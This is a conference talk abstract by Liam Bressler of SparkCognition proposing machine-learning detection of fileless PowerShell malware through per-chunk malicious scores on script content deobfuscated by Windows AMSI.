Liam Bressler

SparkCognition

PowerShell Malware Detection using AMSI

Machine learning techniques have revolutionized the area of file-based malware detection, as evidenced by some excellent talks delivered in the last few years. However, fileless attacks present a much different problem for these traditional techniques, and there has been a lack of research in this area of rising importance. This talk will propose new approaches to solving this difficult problem.


With Windows 10, Microsoft has introduced the Windows Antimalware Scan Interface (AMSI) to its malware-blocking capabilities. In the presenter’s opinion, this service is underutilized among antivirus programs. The interface’s ability to view as well as deobfuscate all manner of scripts (PowerShell, VBScript, etc.) makes it a powerful tool for extracting script code for analysis. However, AMSI does not output the whole script at once, which frustrates current malware detection machine learning approaches.


There are ways to come up with a reasonable solution to script detection, however. Scripts (in particular PowerShell) are often easier to parse than executables (in fact, the PowerShell SDK has a Parser class), so there are very clean features for script machine-learning models. Also, each AMSI chunk can be given a “malicious score”; when the score goes over a certain threshold, the script is stopped. Experiments show that this technique has a surprisingly high efficacy, while not falsely alerting too often.